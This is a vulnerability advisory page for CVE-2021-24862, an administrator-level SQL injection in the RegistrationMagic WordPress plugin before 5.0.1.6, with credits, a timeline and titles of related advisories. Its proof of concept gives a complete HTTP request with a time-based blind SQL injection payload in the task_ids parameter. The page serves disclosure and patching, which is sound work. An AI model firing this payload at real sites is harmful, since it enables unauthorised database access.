RegistrationMagic < 5.0.1.6 – Admin+ SQL Injection | CVE 2021-24862 | Plugin Vulnerabilities

Description

The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches, which could lead to a SQL injection issue

Proof of Concept

When there is at least one task (to created one, go to /wp-admin/admin.php?page=rm_ex_chronos_manage_tasks)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 99
Connection: close
Cookie: [admin+]

action=rm_chronos_ajax&rm_chronos_ajax_action=duplicate_tasks_batch&task_ids[]=1+and+sleep(10))--+-

Affects Plugins

custom-registration-form-builder-with-submission-manager

Fixed in 5.0.1.6

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

http://blog.szfszf.top

Verified

Yes

WPVDB ID

7d3af3b5-5548-419d-aa32-1f7b51622615

Timeline

Publicly Published

2021-12-08 (about 2 years ago)

Added

2021-12-08 (about 2 years ago)

Last Updated

2022-09-26 (about 1 years ago)

Other

Published

Title

Published

2023-02-20

Title

10WebMapBuilder < 1.0.73 - Unauthenticated SQLi

Published

2017-05-31

Title

eventr 1.02.2 - Blind SQL Injection

Published

2023-12-21

Title

Welcart e-Commerce < 2.9.4 - Authenticated(Editor+) SQL Injection

Published

2015-12-15

Title

WP Polls < 2.72 - SQL Injection

Published

2020-06-12

Title

wpDiscuz < 5.3.6 - Unauthenticated SQL Injection